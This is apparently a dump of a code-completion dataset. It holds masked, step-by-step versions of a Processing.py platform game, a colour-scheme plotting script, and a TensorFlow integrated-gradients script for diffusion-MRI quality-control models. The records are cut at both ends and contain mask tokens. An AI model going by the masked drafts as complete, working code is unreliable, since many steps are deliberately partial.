"step-3": "<mask token>\ndelay = 3000\nstartOfGame = False\n\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
"step-4": "from platform_class import *\nfrom player_class import *\nfrom functions import *\ndelay = 3000\nstartOfGame = False\n\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n\n\ndef setup():\n size(500, 800)\n rectMode(CENTER)\n global atStartUp\n atStartUp = True\n global startTimeMs\n startTimeMs = millis()\n global bg, go, sb\n bg = loadImage('assets\\\\background.png')\n bg.resize(width, height)\n go = loadImage('assets\\\\gameover.jpg')\n go.resize(width, height)\n sb = loadImage('assets\\\\start.png')\n sb.resize(width, height)\n global startOfGame\n startOfGame = False\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n\n\ndef draw():\n global atStartUp\n if atStartUp:\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n frameRate(30)\n background(bg)\n for platform in platforms:\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n if p1.ypos > height + 25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text('GAME', width / 2, 2 * height / 10)\n text('OVER', width / 2, 3 * height / 10)\n textSize(30)\n fill(240, 225, 48)\n text('Score: ' + str(p1.score / 100), width / 2, 0.5 * height / 10)\n textSize(20)\n fill(255, 255, 255)\n text('Click anywhere on the screen to RETRY', width / 2, 8 * height /\n 10)\n text('Press ESC to exit', width / 2, 8.5 * height / 10)\n textSize(10)\n fill(240, 225, 48)\n text('Made by Priyam Sahoo', width / 2, 9.5 * height / 10)\n textAlign(LEFT)\n noLoop()\n\n\ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240, 225, 48)\n text(\"Welcome to Fallin't\", width / 2, 0.25 * height / 2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width / 2, 1.65 * height / 2)\n",
"step-5": "from platform_class import *\nfrom player_class import *\nfrom functions import *\n\ndelay = 3000\nstartOfGame = False\n\n\n# def keyPressed():\n# startOfGame = True\n# print(startOfGame)\n# if (keyCode == 'B'):\n# print(\"I am pressed\")\n# startOfGame = True\n\ndef mousePressed():\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n loop()\n \n \ndef setup():\n #global setup options\n size(500, 800)\n rectMode(CENTER)\n \n # sb = loadImage(\"assets\\\\gameover.jpg\")\n # sb.resize(width, height)\n # background(sb)\n \n global atStartUp\n atStartUp = True\n \n global startTimeMs\n startTimeMs = millis()\n \n global bg, go, sb\n bg = loadImage(\"assets\\\\background.png\")\n bg.resize(width, height)\n go = loadImage(\"assets\\\\gameover.jpg\")\n go.resize(width, height)\n sb = loadImage(\"assets\\\\start.png\")\n sb.resize(width, height)\n \n global startOfGame\n startOfGame = False\n \n #list of platforms\n global platforms\n platforms = []\n starter_platform = platform([100, 700])\n platforms.append(starter_platform)\n global p1\n p1 = player()\n \ndef draw():\n global atStartUp\n if (atStartUp):\n currentTimeMs = millis()\n startUpTimeRemaining = delay - (currentTimeMs - startTimeMs)\n startScreen(startUpTimeRemaining)\n atStartUp = startUpTimeRemaining > 0\n return\n \n frameRate(30)\n background(bg)\n for platform in platforms:\n # print (len(platforms))\n platform.display()\n p1.update(platforms)\n platform_manager(platforms)\n \n #this ends the game if the player falls off the screen\n if p1.ypos > height+25:\n background(go)\n fill(255, 255, 255)\n textAlign(CENTER, CENTER)\n textSize(80)\n text(\"GAME\", width/2, 2*height/10)\n text(\"OVER\", width/2, 3*height/10)\n textSize(30)\n fill(240,225,48)\n text(\"Score: \"+str(p1.score/100), width/2, 0.5*height/10)\n textSize(20)\n fill(255, 255, 255)\n text(\"Click anywhere on the screen to RETRY\", width/2, 8*height/10)\n text(\"Press ESC to exit\", width/2, 8.5*height/10)\n textSize(10)\n fill(240,225,48)\n text(\"Made by Priyam Sahoo\", width/2, 9.5*height/10)\n textAlign(LEFT)\n noLoop()\n \n \ndef startScreen(remainingTime):\n background(sb)\n fill(0)\n textAlign(CENTER, CENTER)\n textSize(40)\n fill(240,225,48)\n text(\"Welcome to Fallin't\", width/2, 0.25*height/2)\n textSize(100)\n fill(50, 50, 50)\n text(ceil(remainingTime / 1000.0), width/2, 1.65*height/2)\n \n \n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for name, hexcode in zip(cs.colornames, cs.colors):
print('%s: %s' % (hexcode, name))
<|reserved_special_token_0|>
cs.example_plot(ax)
fig.savefig('latest.png', dpi=200, bbox_inches='tight')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cs = Colorschemez.latest()
for name, hexcode in zip(cs.colornames, cs.colors):
print('%s: %s' % (hexcode, name))
fig, ax = plt.subplots()
cs.example_plot(ax)
fig.savefig('latest.png', dpi=200, bbox_inches='tight')
<|reserved_special_token_1|>
from ScientificColorschemez import Colorschemez
import matplotlib.pyplot as plt
cs = Colorschemez.latest()
for name, hexcode in zip(cs.colornames, cs.colors):
print('%s: %s' % (hexcode, name))
fig, ax = plt.subplots()
cs.example_plot(ax)
fig.savefig('latest.png', dpi=200, bbox_inches='tight')
|
flexible
|
{
"blob_id": "7106a8ddbec60ce4b7d9e8e5ce8d7df02e5f7222",
"index": 6854,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\n<mask token>\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n",
"step-3": "<mask token>\ncs = Colorschemez.latest()\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\nfig, ax = plt.subplots()\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n",
"step-4": "from ScientificColorschemez import Colorschemez\nimport matplotlib.pyplot as plt\ncs = Colorschemez.latest()\nfor name, hexcode in zip(cs.colornames, cs.colors):\n print('%s: %s' % (hexcode, name))\nfig, ax = plt.subplots()\ncs.example_plot(ax)\nfig.savefig('latest.png', dpi=200, bbox_inches='tight')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import argparse
import gc
import gcsfs
import nibabel as nib
import nilearn
import nobrainer
import numpy as np
import os
import os.path as op
import pandas as pd
import tensorflow as tf
def interpolate_images(baseline, image, alphas):
alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]
baseline_x = tf.expand_dims(baseline, axis=0)
input_x = tf.expand_dims(image, axis=0)
delta = input_x - baseline_x
images = baseline_x + alphas_x * delta
return images
def compute_gradients(model, images, target_class):
with tf.GradientTape() as tape:
tape.watch(images)
raw_probs = model(images)
probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class
gradients = tape.gradient(probs, images)
return gradients
def integral_approximation(gradients):
# riemann_trapezoidal
grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)
return tf.math.reduce_mean(grads, axis=0)
@tf.function
def integrated_gradients(
model, baseline, image, target_class, m_steps=50, batch_size=32
):
# 1. Generate alphas.
alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)
# Initialize TensorArray outside loop to collect gradients.
gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)
# Iterate alphas range and batch computation for speed, memory efficiency, and scaling to larger m_steps.
for alpha in tf.range(0, len(alphas), batch_size):
from_ = alpha
to = tf.minimum(from_ + batch_size, len(alphas))
alpha_batch = alphas[from_:to]
# 2. Generate interpolated inputs between baseline and input.
interpolated_path_input_batch = interpolate_images(
baseline=baseline, image=image, alphas=alpha_batch
)
# 3. Compute gradients between model outputs and interpolated inputs.
gradient_batch = compute_gradients(
model=model,
images=interpolated_path_input_batch,
target_class=target_class,
)
# Write batch indices and gradients to extend TensorArray.
gradient_batches = gradient_batches.scatter(tf.range(from_, to), gradient_batch)
# Stack path gradients together row-wise into single tensor.
total_gradients = gradient_batches.stack()
# 4. Integral approximation through averaging gradients.
avg_gradients = integral_approximation(gradients=total_gradients)
# 5. Scale integrated gradients with respect to input.
return (image - baseline) * avg_gradients
def main(
gcs_bucket,
n_channels=5,
dataset_name="b0-tensorfa-dwiqc",
model_dir="b0_tensorfa_dwiqc",
dataset_seed=8,
target_class=1,
confusion_class="true_pos",
):
print("Setting gpu thread mode to gpu_private.")
os.environ["TF_GPU_THREAD_MODE"] = "gpu_private"
print("Configuring distribution strategy")
use_tpu = False
try:
resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu="")
tf.config.experimental_connect_to_cluster(resolver)
# This is the TPU initialization code that has to be at the beginning.
tf.tpu.experimental.initialize_tpu_system(resolver)
strategy = tf.distribute.TPUStrategy(resolver)
use_tpu = True
print("TPU detected.")
print("All devices: ", tf.config.list_logical_devices("TPU"))
except ValueError:
strategy = tf.distribute.MirroredStrategy()
print("GPUs detected.")
print("Number of accelerators: ", strategy.num_replicas_in_sync)
# Train using mixed-precision policy
tf.keras.mixed_precision.set_global_policy("mixed_float16")
scope = strategy.scope()
# Setting location were training logs and checkpoints will be stored
GCS_BASE_PATH = f"gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}"
GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, "saved_model")
GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, "integrated_gradients")
fs = gcsfs.GCSFileSystem()
LOCAL_SAVED_MODEL_DIR = "saved_model"
LOCAL_OUTPUT_DIR = "output"
os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)
os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)
fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)
# Specify the datasets on GCP storage
GCS_DATA_PATH = f"gs://{gcs_bucket}"
GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, "tfrecs", dataset_name, "all-data")
if use_tpu:
device_alldata_dir = GCS_ALLDATA_DIR
else:
LOCAL_ALLDATA_DIR = op.join(".", "tfrecs", dataset_name, "all-data")
os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)
fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)
device_alldata_dir = LOCAL_ALLDATA_DIR
volume_shape = (128, 128, 128, n_channels)
element_spec = (
tf.TensorSpec(shape=(), dtype=tf.int64, name=None),
(
tf.TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None),
tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None),
),
)
dataset = tf.data.experimental.load(
op.join(device_alldata_dir, confusion_class),
element_spec=element_spec,
)
volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]
baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)
print("Computing integrated gradients")
with scope:
model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)
ig_attributions = [
integrated_gradients(
model=model,
baseline=baseline,
image=volume,
target_class=target_class,
m_steps=128,
batch_size=1,
)
for volume in volumes
]
if target_class == 1:
postfix = "attribution_pass"
else:
postfix = "attribution_fail"
ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))
tf.data.experimental.save(
ig_dataset,
op.join(LOCAL_OUTPUT_DIR, f"ig_{confusion_class}_{postfix}"),
)
affine = np.diag([1, 1, 1, 1])
volume_niftis = [
{
"b0": nib.Nifti1Image(volume[:, :, :, 3].numpy(), affine),
"color_fa": nib.Nifti1Image(volume[:, :, :, :3].numpy(), affine),
}
for volume in volumes
]
ig_niftis = [
{
"b0": nib.Nifti1Image(attribution[:, :, :, 3].numpy(), affine),
"color_fa": nib.Nifti1Image(attribution[:, :, :, :3].numpy(), affine),
"sum": nib.Nifti1Image(
tf.math.reduce_sum(attribution[:, :, :, :4], axis=-1).numpy(), affine
),
}
for attribution in ig_attributions
]
for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis, ig_niftis)):
for key, value in volume_nifti.items():
nib.save(
value,
op.join(LOCAL_OUTPUT_DIR, f"{confusion_class}_{key}_{idx}.nii.gz"),
)
for key, value in ig_nifti.items():
nib.save(
value,
op.join(
LOCAL_OUTPUT_DIR, f"{confusion_class}_{postfix}_{key}_{idx}.nii.gz"
),
)
fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--gcs_bucket",
type=str,
help=(
"The name of the gcs bucket that will contain the saved models, "
"checkpoints, etc."
),
)
parser.add_argument(
"--n_channels",
type=int,
help="The number of channels in the data.",
default=5,
)
parser.add_argument(
"--dataset_name",
type=str,
help="The name of the dataset in the tfrecs folder of the GCS bucket.",
default="b0-tensorfa-dwiqc",
)
parser.add_argument(
"--model_dir",
type=str,
help="The name of the GCS directory in which the tensorflow model is saved.",
default="b0_tensorfa_dwiqc",
)
parser.add_argument(
"--dataset_seed",
type=int,
help="The seed for the dataset",
default=8,
)
parser.add_argument(
"--target_class",
type=int,
help="The target class for the integrated gradients.",
default=1,
)
parser.add_argument(
"--confusion_class",
type=str,
help="The confusion class for which to compute integrated gradients",
default="true_pos",
)
args = parser.parse_args()
main(
gcs_bucket=args.gcs_bucket,
n_channels=args.n_channels,
dataset_name=args.dataset_name,
model_dir=args.model_dir,
dataset_seed=args.dataset_seed,
target_class=args.target_class,
confusion_class=args.confusion_class,
)
|
normal
|
{
"blob_id": "848e4abcd0b4f118030fc62f1272a19bfce9db4e",
"index": 178,
"step-1": "<mask token>\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n<mask token>\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(model, baseline, image, target_class, m_steps=50,\n batch_size=32):\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n interpolated_path_input_batch = interpolate_images(baseline=\n baseline, image=image, alphas=alpha_batch)\n gradient_batch = compute_gradients(model=model, images=\n interpolated_path_input_batch, target_class=target_class)\n gradient_batches = gradient_batches.scatter(tf.range(from_, to),\n gradient_batch)\n total_gradients = gradient_batches.stack()\n avg_gradients = integral_approximation(gradients=total_gradients)\n return (image - baseline) * avg_gradients\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 'all-data')\n os.makedirs(LOCAL_ALLDATA_DIR, exist_ok=True)\n fs.get(GCS_ALLDATA_DIR, LOCAL_ALLDATA_DIR, recursive=True)\n device_alldata_dir = LOCAL_ALLDATA_DIR\n volume_shape = 128, 128, 128, n_channels\n element_spec = tf.TensorSpec(shape=(), dtype=tf.int64, name=None), (tf.\n TensorSpec(shape=(1, 128, 128, 128, 5), dtype=tf.float32, name=None\n ), tf.TensorSpec(shape=(1,), dtype=tf.float32, name=None))\n dataset = tf.data.experimental.load(op.join(device_alldata_dir,\n confusion_class), element_spec=element_spec)\n volumes = [tf.squeeze(tensor[0]) for _, tensor in dataset]\n baseline = tf.zeros(shape=volume_shape, dtype=tf.float32)\n print('Computing integrated gradients')\n with scope:\n model = tf.keras.models.load_model(LOCAL_SAVED_MODEL_DIR)\n ig_attributions = [integrated_gradients(model=model, baseline=\n baseline, image=volume, target_class=target_class, m_steps=128,\n batch_size=1) for volume in volumes]\n if target_class == 1:\n postfix = 'attribution_pass'\n else:\n postfix = 'attribution_fail'\n ig_dataset = tf.data.Dataset.from_tensor_slices(tf.stack(ig_attributions))\n tf.data.experimental.save(ig_dataset, op.join(LOCAL_OUTPUT_DIR,\n f'ig_{confusion_class}_{postfix}'))\n affine = np.diag([1, 1, 1, 1])\n volume_niftis = [{'b0': nib.Nifti1Image(volume[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(volume[:, :, :, :3].numpy(),\n affine)} for volume in volumes]\n ig_niftis = [{'b0': nib.Nifti1Image(attribution[:, :, :, 3].numpy(),\n affine), 'color_fa': nib.Nifti1Image(attribution[:, :, :, :3].numpy\n (), affine), 'sum': nib.Nifti1Image(tf.math.reduce_sum(attribution[\n :, :, :, :4], axis=-1).numpy(), affine)} for attribution in\n ig_attributions]\n for idx, (volume_nifti, ig_nifti) in enumerate(zip(volume_niftis,\n ig_niftis)):\n for key, value in volume_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{key}_{idx}.nii.gz'))\n for key, value in ig_nifti.items():\n nib.save(value, op.join(LOCAL_OUTPUT_DIR,\n f'{confusion_class}_{postfix}_{key}_{idx}.nii.gz'))\n fs.put(LOCAL_OUTPUT_DIR, GCS_OUTPUT_DIR, recursive=True)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef interpolate_images(baseline, image, alphas):\n alphas_x = alphas[:, tf.newaxis, tf.newaxis, tf.newaxis, tf.newaxis]\n baseline_x = tf.expand_dims(baseline, axis=0)\n input_x = tf.expand_dims(image, axis=0)\n delta = input_x - baseline_x\n images = baseline_x + alphas_x * delta\n return images\n\n\ndef compute_gradients(model, images, target_class):\n with tf.GradientTape() as tape:\n tape.watch(images)\n raw_probs = model(images)\n probs = (1 - raw_probs) * (1 - target_class) + raw_probs * target_class\n gradients = tape.gradient(probs, images)\n return gradients\n\n\ndef integral_approximation(gradients):\n grads = (gradients[:-1] + gradients[1:]) / tf.constant(2.0)\n return tf.math.reduce_mean(grads, axis=0)\n\n\n@tf.function\ndef integrated_gradients(model, baseline, image, target_class, m_steps=50,\n batch_size=32):\n alphas = tf.linspace(start=0.0, stop=1.0, num=m_steps + 1)\n gradient_batches = tf.TensorArray(tf.float32, size=m_steps + 1)\n for alpha in tf.range(0, len(alphas), batch_size):\n from_ = alpha\n to = tf.minimum(from_ + batch_size, len(alphas))\n alpha_batch = alphas[from_:to]\n interpolated_path_input_batch = interpolate_images(baseline=\n baseline, image=image, alphas=alpha_batch)\n gradient_batch = compute_gradients(model=model, images=\n interpolated_path_input_batch, target_class=target_class)\n gradient_batches = gradient_batches.scatter(tf.range(from_, to),\n gradient_batch)\n total_gradients = gradient_batches.stack()\n avg_gradients = integral_approximation(gradients=total_gradients)\n return (image - baseline) * avg_gradients\n\n\ndef main(gcs_bucket, n_channels=5, dataset_name='b0-tensorfa-dwiqc',\n model_dir='b0_tensorfa_dwiqc', dataset_seed=8, target_class=1,\n confusion_class='true_pos'):\n print('Setting gpu thread mode to gpu_private.')\n os.environ['TF_GPU_THREAD_MODE'] = 'gpu_private'\n print('Configuring distribution strategy')\n use_tpu = False\n try:\n resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='')\n tf.config.experimental_connect_to_cluster(resolver)\n tf.tpu.experimental.initialize_tpu_system(resolver)\n strategy = tf.distribute.TPUStrategy(resolver)\n use_tpu = True\n print('TPU detected.')\n print('All devices: ', tf.config.list_logical_devices('TPU'))\n except ValueError:\n strategy = tf.distribute.MirroredStrategy()\n print('GPUs detected.')\n print('Number of accelerators: ', strategy.num_replicas_in_sync)\n tf.keras.mixed_precision.set_global_policy('mixed_float16')\n scope = strategy.scope()\n GCS_BASE_PATH = f'gs://{gcs_bucket}/{model_dir}/seed_{dataset_seed}'\n GCS_SAVED_MODEL_DIR = op.join(GCS_BASE_PATH, 'saved_model')\n GCS_OUTPUT_DIR = op.join(GCS_BASE_PATH, 'integrated_gradients')\n fs = gcsfs.GCSFileSystem()\n LOCAL_SAVED_MODEL_DIR = 'saved_model'\n LOCAL_OUTPUT_DIR = 'output'\n os.makedirs(LOCAL_SAVED_MODEL_DIR, exist_ok=True)\n os.makedirs(LOCAL_OUTPUT_DIR, exist_ok=True)\n fs.get(GCS_SAVED_MODEL_DIR, LOCAL_SAVED_MODEL_DIR, recursive=True)\n GCS_DATA_PATH = f'gs://{gcs_bucket}'\n GCS_ALLDATA_DIR = op.join(GCS_DATA_PATH, 'tfrecs', dataset_name, 'all-data'\n )\n if use_tpu:\n device_alldata_dir = GCS_ALLDATA_DIR\n else:\n LOCAL_ALLDATA_DIR = op.join('.', 'tfrecs', dataset_name, 